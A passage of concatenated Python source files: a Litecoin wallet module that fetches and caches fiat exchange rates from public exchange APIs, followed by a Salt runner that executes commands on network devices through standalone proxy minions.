exception_text = traceback.format_exc()
print(str(datetime.now())+' '+avi_controller+': '+exception_text)
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob, make_dir
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class Bit2C(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bit2c.co.il', '/Exchanges/LTCNIS/Ticker.json')
return {'NIS': Decimal(json['ll'])}
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("LTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/LTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['LTC'][r]) for r in json['LTC']
if json['LTC'][r] is not None] # Giving NULL sometimes
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=LTC")[ccy +'_LTC']
class Bitfinex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitfinex.com', '/v1/pubticker/ltcusd')
return {'USD': Decimal(json['last_price'])}
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v3/ticker/?book=ltc_mxn')
return {'MXN': Decimal(json['payload']['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/v2/ticker/ltcusd/')
return {'USD': Decimal(json['last'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=LTC')
rates = json['data']['rates']
return dict([(k, Decimal(rates[k])) for k in rates])
class CoinSpot(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.coinspot.com.au', '/pubapi/latest')
return {'AUD': Decimal(json['prices']['ltc']['last'])}
class GoCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('x.g0cn.com', '/prices')
ltc_prices = json['prices']['LTC']
return dict([(r, Decimal(ltc_prices[r])) for r in ltc_prices])
class HitBTC(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
json = self.get_json('api.hitbtc.com', '/api/1/public/LTC%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['last'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
pairs = [k for k in dicts['result'] if k.startswith('XLTCZ')]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
ccys = [p[5:] for p in pairs]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['result']['XLTCZ'+ccy]['c'][0])
return result
def history_ccys(self):
return ['EUR', 'USD']
def request_history(self, ccy):
query = '/0/public/OHLC?pair=LTC%s&interval=1440' % ccy
json = self.get_json('api.kraken.com', query)
history = json['result']['XLTCZ'+ccy]
return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
for t in history])
class OKCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.okcoin.com', '/api/v1/ticker.do?symbol=ltc_usd')
return {'USD': Decimal(json['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('www.mercadobitcoin.net', '/api/ltc/ticker/')
return {'BRL': Decimal(json['ticker']['last'])}
class TheRockTrading(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.therocktrading.com',
'/v1/funds/LTCEUR/ticker')
return {'EUR': Decimal(json['last'])}
class QuadrigaCX(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.quadrigacx.com', '/v2/ticker?book=ltc_cad')
return {'CAD': Decimal(json['last'])}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/ltc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/ltc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/ltc_usd')
return {'EUR': Decimal(json_eur['ltc_eur']['last']),
'RUB': Decimal(json_rub['ltc_rur']['last']),
'USD': Decimal(json_usd['ltc_usd']['last'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
make_dir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
proxy.py
|
# -*- coding: utf-8 -*-
# Copyright 2019-2020 Mircea Ulinic. All rights reserved.
#
# The contents of this file are licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
'''
Salt Runner to invoke arbitrary commands on network devices that are not
managed via a Proxy or regular Minion. Therefore, this Runner doesn't
necessarily require the targets to be up and running, as it will connect to
collect the Grains, compile the Pillar, then execute the commands.
'''
from __future__ import absolute_import, print_function, unicode_literals
# Import Python std lib
import sys
import copy
import json
import math
import time
import hashlib
import logging
import threading
import traceback
import multiprocessing
# Import Salt modules
import salt.cache
import salt.loader
import salt.output
import salt.version
import salt.utils.jid
import salt.utils.master
from salt.ext import six
from salt.minion import SMinion
from salt.cli.batch import Batch
import salt.utils.stringutils
import salt.defaults.exitcodes
from salt.exceptions import SaltSystemExit, SaltInvocationError
from salt.defaults import DEFAULT_TARGET_DELIM
import salt.utils.napalm
import salt.utils.dictupdate
try:
import salt.utils.platform
from salt.utils.args import clean_kwargs
OLD_SALT = False
except ImportError:
OLD_SALT = True
import salt.utils
from salt.utils import clean_kwargs
try:
import progressbar
HAS_PROGRESSBAR = True
except ImportError:
HAS_PROGRESSBAR = False
# ------------------------------------------------------------------------------
# module properties
# ------------------------------------------------------------------------------
_SENTINEL = 'FIN.'
log = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
# property functions
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# helper functions -- will not be exported
# ------------------------------------------------------------------------------
def _napalm_is_proxy(opts):
return opts.get('proxy', {}).get('proxytype') == 'napalm'
# Point the native is_proxy function to the above, so it doesn't check whether
# we're actually running under a Proxy Minion
salt.utils.napalm.is_proxy = _napalm_is_proxy
def _is_proxy():
return True
# Same rationale as above, for any other Proxy type.
if not OLD_SALT:
salt.utils.platform.is_proxy = _is_proxy
else:
salt.utils.is_proxy = _is_proxy
def _salt_call_and_return(
minion_id,
salt_function,
ret_queue,
unreachable_devices,
failed_devices,
arg=None,
jid=None,
events=True,
**opts
):
'''
'''
opts['jid'] = jid
ret, retcode = salt_call(
minion_id,
salt_function,
unreachable_devices=unreachable_devices,
failed_devices=failed_devices,
**opts
)
if events:
__salt__['event.send'](
'proxy/runner/{jid}/ret/{minion_id}'.format(minion_id=minion_id, jid=jid),
{
'fun': salt_function,
'fun_args': arg,
'id': minion_id,
'jid': jid,
'return': ret,
'retcode': retcode,
'success': retcode == 0,
},
)
try:
ret = json.loads(json.dumps(ret))
except (ValueError, TypeError):
log.error('Function return is not JSON-serializable data', exc_info=True)
log.error(ret)
ret_queue.put(({minion_id: ret}, retcode))
sys.exit(retcode)
def _existing_proxy_cli_batch(
cli_batch, ret_queue, batch_stop_queue, sproxy_stop_queue
):
'''
'''
run = cli_batch.run()
cumulative_retcode = 0
for ret in run:
if not sproxy_stop_queue.empty():
break
retcode = 0
if ret and isinstance(ret, dict):
minion_id = list(ret.keys())[0]
if isinstance(ret[minion_id], dict) and 'retcode' in ret[minion_id]:
retcode = ret[minion_id].pop('retcode')
ret_queue.put((ret, retcode))
cumulative_retcode = max(cumulative_retcode, retcode)
batch_stop_queue.put(cumulative_retcode)
def _receive_replies_async(ret_queue, progress_bar):
'''
'''
count = 0
while True:
ret, retcode = ret_queue.get()
count += 1
if ret == _SENTINEL:
break
# When async, print out the replies as soon as they arrive
# after passing them through the outputter of choice
out_fmt = salt.output.out_format(
ret, __opts__.get('output', 'nested'), opts=__opts__, _retcode=retcode,
)
if out_fmt:
# out_fmt can be empty string, for example, when using the ``quiet``
# outputter, or potentially other use cases.
salt.utils.stringutils.print_cli(out_fmt)
if progress_bar:
progress_bar.update(count)
def _receive_replies_sync(ret_queue, static_queue, progress_bar):
'''
'''
count = 0
cumulative_retcode = 0
while True:
ret, retcode = ret_queue.get()
static_queue.put((ret, retcode))
count += 1
if ret == _SENTINEL:
break
if progress_bar:
progress_bar.update(count)
# The SProxyMinion class is back-ported from Salt 2019.2.0 (to be released soon)
# and extended to allow more flexible options for the (pre-)loading of the
# Pillars and the Grains.
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def _matches_target(self):
match_func = self.matchers.get(
'{0}_match.match'.format(self.opts['__tgt_type']), None
)
if match_func is None:
return False
if self.opts['__tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = self.opts.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(self.opts['__tgt'], delimiter=delimiter):
return False
elif not match_func(self.opts['__tgt']):
return False
else:
if not self.matchers['glob_match.match'](self.opts['__tgt']):
return False
return True
def gen_modules(self, initial_load=False): # pylint: disable=arguments-differ
'''
Tell the minion to reload the execution modules.
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
if self.opts.get('proxy_preload_grains', True):
loaded_grains = salt.loader.grains(self.opts)
self.opts['grains'].update(loaded_grains)
if (
self.opts['roster_opts']
and self.opts.get('proxy_merge_roster_grains', True)
and 'grains' in self.opts['roster_opts']
and isinstance(self.opts['roster_opts']['grains'], dict)
):
# Merge the Grains from the Roster opts
log.debug('Merging Grains with the Roster provided ones')
self.opts['grains'] = salt.utils.dictupdate.merge(
self.opts['roster_opts']['grains'], self.opts['grains']
)
if self.opts.get('proxy_load_pillar', True):
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if self.opts['roster_opts'] and self.opts.get('proxy_merge_roster_opts', True):
if 'proxy' not in self.opts['pillar']:
self.opts['pillar']['proxy'] = {}
self.opts['pillar']['proxy'] = salt.utils.dictupdate.merge(
self.opts['pillar']['proxy'], self.opts['roster_opts']
)
self.opts['pillar']['proxy'].pop('name', None)
self.opts['pillar']['proxy'].pop('grains', None)
self.opts['pillar']['proxy'].pop('pillar', None)
if self.opts.get('preload_targeting', False) or self.opts.get(
'invasive_targeting', False
):
log.debug('Loading the Matchers modules')
self.matchers = salt.loader.matchers(self.opts)
if self.opts.get('preload_targeting', False):
log.debug(
'Preload targeting requested, trying to see if %s matches the target %s (%s)',
self.opts['id'],
str(self.opts['__tgt']),
self.opts['__tgt_type'],
)
matched = self._matches_target()
if not matched:
return
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = {}
if 'proxy' not in self.opts['pillar']:
self.opts['pillar']['proxy'] = {}
self.opts['proxy'] = salt.utils.dictupdate.merge(
self.opts['proxy'], self.opts['pillar']['proxy']
)
# Then load the proxy module
fq_proxyname = self.opts['proxy']['proxytype']
self.utils = salt.loader.utils(self.opts)
self.proxy = salt.loader.proxy(
self.opts, utils=self.utils, whitelist=[fq_proxyname]
)
self.functions = salt.loader.minion_mods(
self.opts, utils=self.utils, notify=False, proxy=self.proxy
)
self.functions.pack['__grains__'] = copy.deepcopy(self.opts['grains'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__pillar__'] = self.opts['pillar']
# No need to inject the proxy into utils, as we don't need scheduler for
# this sort of short living Minion.
# self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if self.opts.get('proxy_no_connect', False):
log.info('Requested not to initialize the connection with the device')
else:
log.debug('Trying to initialize the connection with the device')
# When requested --no-connect, don't init the connection, but simply
# go ahead and execute the function requested.
if (
'{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy
):
errmsg = (
'[{0}] Proxymodule {1} is missing an init() or a shutdown() or both. '.format(
self.opts['id'], fq_proxyname
)
+ 'Check your proxymodule. Salt-proxy aborted.'
)
log.error(errmsg)
self._running = False
if self.unreachable_devices is not None:
self.unreachable_devices.append(self.opts['id'])
raise SaltSystemExit(
code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg
)
proxy_init_fn = self.proxy[fq_proxyname + '.init']
try:
proxy_init_fn(self.opts)
self.connected = True
except Exception as exc:
log.error(
'Encountered error when starting up the connection with %s:',
self.opts['id'],
exc_info=True,
)
if self.unreachable_devices is not None:
self.unreachable_devices.append(self.opts['id'])
raise
if self.opts.get('proxy_load_grains', True):
# When the Grains are loaded from the cache, no need to re-load them
# again.
grains = copy.deepcopy(self.opts['grains'])
# Copy the existing Grains loaded so far, otherwise
# salt.loader.grains is going to wipe what's under the grains
# key in the opts.
# After loading, merge with the previous loaded grains, which
# may contain other grains from different sources, e.g., roster.
loaded_grains = salt.loader.grains(self.opts, proxy=self.proxy)
self.opts['grains'] = salt.utils.dictupdate.merge(grains, loaded_grains)
if self.opts.get('proxy_load_pillar', True):
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.functions.pack['__opts__'] = self.opts
self.functions.pack['__grains__'] = copy.deepcopy(self.opts['grains'])
self.functions.pack['__pillar__'] = copy.deepcopy(self.opts['pillar'])
self.grains_cache = copy.deepcopy(self.opts['grains'])
if self.opts.get('invasive_targeting', False):
log.info(
'Invasive targeting requested, trying to see if %s matches the target %s (%s)',
self.opts['id'],
str(self.opts['__tgt']),
self.opts['__tgt_type'],
)
matched = self._matches_target()
if not matched:
# Didn't match, shutting down this Proxy Minion, and exiting.
log.debug(
'%s does not match the target expression, aborting', self.opts['id']
)
proxy_shut_fn = self.proxy[fq_proxyname + '.shutdown']
proxy_shut_fn(self.opts)
return
self.module_executors = self.proxy.get(
'{0}.module_executors'.format(fq_proxyname), lambda: []
)() or self.opts.get('module_executors', [])
if self.module_executors:
self.executors = salt.loader.executors(
self.opts, self.functions, proxy=self.proxy
)
# Late load the Returners, as they might need Grains, which may not be
# properly or completely loaded before this.
self.returners = None
if self.opts['returner']:
self.returners = salt.loader.returners(
self.opts, self.functions, proxy=self.proxy
)
self.proxy.pack['__ret__'] = self.returners
self.ready = True
class StandaloneProxy(SProxyMinion):
def __init__(
self, opts, unreachable_devices=None
): # pylint: disable=super-init-not-called
self.opts = opts
self.connected = False
self.ready = False
self.unreachable_devices = unreachable_devices
self.gen_modules()
# ------------------------------------------------------------------------------
# callable functions
# ------------------------------------------------------------------------------
def salt_call(
minion_id,
salt_function=None,
unreachable_devices=None,
failed_devices=None,
with_grains=True,
with_pillar=True,
preload_grains=True,
preload_pillar=True,
default_grains=None,
default_pillar=None,
cache_grains=True,
cache_pillar=True,
use_cached_grains=True,
use_cached_pillar=True,
use_existing_proxy=False,
no_connect=False,
jid=None,
roster_opts=None,
test_ping=False,
tgt=None,
tgt_type=None,
preload_targeting=False,
invasive_targeting=False,
failhard=False,
timeout=60,
returner='',
returner_config='',
returner_kwargs=None,
args=(),
**kwargs
):
'''
Invoke a Salt Execution Function that requires or invokes an NAPALM
functionality (directly or indirectly).
minion_id:
The ID of the Minion to compile Pillar data for.
salt_function
The name of the Salt function to invoke.
preload_grains: ``True``
Whether to preload the Grains before establishing the connection with
the remote network device.
default_grains:
Dictionary of the default Grains to make available within the functions
loaded.
with_grains: ``True``
Whether to load the Grains modules and collect Grains data and make it
available inside the Execution Functions.
The Grains will be loaded after opening the connection with the remote
network device.
preload_pillar: ``True``
Whether to preload Pillar data before opening the connection with the
remote network device.
default_pillar:
Dictionary of the default Pillar data to make it available within the
functions loaded.
with_pillar: ``True``
Whether to load the Pillar modules and compile Pillar data and make it
available inside the Execution Functions.
use_cached_pillar: ``True``
Use cached Pillars whenever possible. If unable to gather cached data,
it falls back to compiling the Pillar.
use_cached_grains: ``True``
Use cached Grains whenever possible. If unable to gather cached data,
it falls back to collecting Grains.
cache_pillar: ``True``
Cache the compiled Pillar data before returning.
cache_grains: ``True``
Cache the collected Grains before returning.
use_existing_proxy: ``False``
Use the existing Proxy Minions when they are available (say on an
already running Master).
no_connect: ``False``
Don't attempt to initiate the connection with the remote device.
Default: ``False`` (it will initiate the connection).
jid: ``None``
The JID to pass on, when executing.
test_ping: ``False``
When using the existing Proxy Minion with the ``use_existing_proxy``
option, can use this argument to verify also if the Minion is
responsive.
arg
The list of arguments to send to the Salt function.
kwargs
Key-value arguments to send to the Salt function.
CLI Example:
.. code-block:: bash
salt-run proxy.salt_call bgp.neighbors junos 1.2.3.4 test test123
salt-run proxy.salt_call net.load_config junos 1.2.3.4 test test123 text='set system ntp peer 1.2.3.4'
'''
opts = copy.deepcopy(__opts__)
opts['id'] = minion_id
opts['pillarenv'] = __opts__.get('pillarenv', 'base')
opts['__cli'] = __opts__.get('__cli', 'salt-call')
opts['__tgt'] = tgt
opts['__tgt_type'] = tgt_type
if 'saltenv' not in opts:
opts['saltenv'] = 'base'
if not default_grains:
default_grains = {}
opts['grains'] = default_grains
if not default_pillar:
default_pillar = {}
opts['pillar'] = default_pillar
opts['proxy_load_pillar'] = with_pillar
opts['proxy_load_grains'] = with_grains
opts['proxy_preload_pillar'] = preload_pillar
opts['proxy_preload_grains'] = preload_grains
opts['proxy_cache_grains'] = cache_grains
opts['proxy_cache_pillar'] = cache_pillar
opts['preload_targeting'] = preload_targeting
opts['invasive_targeting'] = invasive_targeting
opts['proxy_use_cached_grains'] = use_cached_grains
opts['proxy_no_connect'] = no_connect
opts['proxy_test_ping'] = test_ping
opts['roster_opts'] = roster_opts
opts['returner'] = returner
if not returner_kwargs:
returner_kwargs = {}
minion_defaults = salt.config.DEFAULT_MINION_OPTS.copy()
minion_defaults.update(salt.config.DEFAULT_PROXY_MINION_OPTS)
for opt, val in six.iteritems(minion_defaults):
if opt not in opts:
opts[opt] = val
sa_proxy = StandaloneProxy(opts, unreachable_devices)
if not sa_proxy.ready:
log.debug(
'The SProxy Minion for %s is not able to start up, aborting', opts['id']
)
return
kwargs = clean_kwargs(**kwargs)
ret = None
retcode = 0
executors = getattr(sa_proxy, 'module_executors')
try:
if executors:
for name in executors:
ex_name = '{}.execute'.format(name)
if ex_name not in sa_proxy.executors:
raise SaltInvocationError(
"Executor '{0}' is not available".format(name)
)
ret = sa_proxy.executors[ex_name](
opts, {'fun': salt_function}, salt_function, args, kwargs
)
if ret is not None:
break
else:
ret = sa_proxy.functions[salt_function](*args, **kwargs)
retcode = sa_proxy.functions.pack['__context__'].get('retcode', 0)
except Exception as err:
log.info('Exception while running %s on %s', salt_function, opts['id'])
if failed_devices is not None:
failed_devices.append(opts['id'])
ret = 'The minion function caused an exception: {err}'.format(
err=traceback.format_exc()
)
if not retcode:
retcode = 11
if failhard:
raise
finally:
if sa_proxy.connected:
shut_fun = '{}.shutdown'.format(sa_proxy.opts['proxy']['proxytype'])
sa_proxy.proxy[shut_fun](opts)
if returner:
returner_fun = '{}.returner'.format(returner)
if returner_fun in sa_proxy.returners:
log.debug(
'Sending the response from %s to the %s Returner', opts['id'], returner,
)
ret_data = {
'id': opts['id'],
'jid': jid,
'fun': salt_function,
'fun_args': args,
'return': ret,
'ret_config': returner_config,
'ret_kwargs': returner_kwargs,
}
try:
sa_proxy.returners[returner_fun](ret_data)
except Exception as err:
log.error(
'Exception while sending the response from %s to the %s returner',
opts['id'],
returner,
)
log.error(err, exc_info=True)
else:
log.warning(
'Returner %s is not available. Check that the dependencies are properly installed'
)
if cache_grains:
log.debug('Caching Grains for %s', minion_id)
log.debug(sa_proxy.opts['grains'])
cache_store = __salt__['cache.store'](
'minions/{}/data'.format(minion_id), 'grains', sa_proxy.opts['grains']
)
if cache_pillar:
log.debug('Caching Pillar for %s', minion_id)
cached_store = __salt__['cache.store'](
'minions/{}/data'.format(minion_id), 'pillar', sa_proxy.opts['pillar']
)
return ret, retcode
def execute_devices(
minions,
salt_function,
with_grains=True,
with_pillar=True,
preload_grains=True,
preload_pillar=True,
default_grains=None,
default_pillar=None,
args=(),
batch_size=10,
batch_wait=0,
static=False,
tgt=None,
tgt_type=None,
jid=None,
events=True,
cache_grains=True,
cache_pillar=True,
use_cached_grains=True,
use_cached_pillar=True,
use_existing_proxy=False,
existing_minions=None,
no_connect=False,
roster_targets=None,
test_ping=False,
preload_targeting=False,
invasive_targeting=False,
failhard=False,
timeout=60,
summary=False,
verbose=False,
progress=False,
hide_timeout=False,
returner='',
returner_config='',
returner_kwargs=None,
**kwargs
):
'''
Execute a Salt function on a group of network devices identified by their
Minion ID, as listed under the ``minions`` argument.
minions
A list of Minion IDs to invoke ``function`` on.
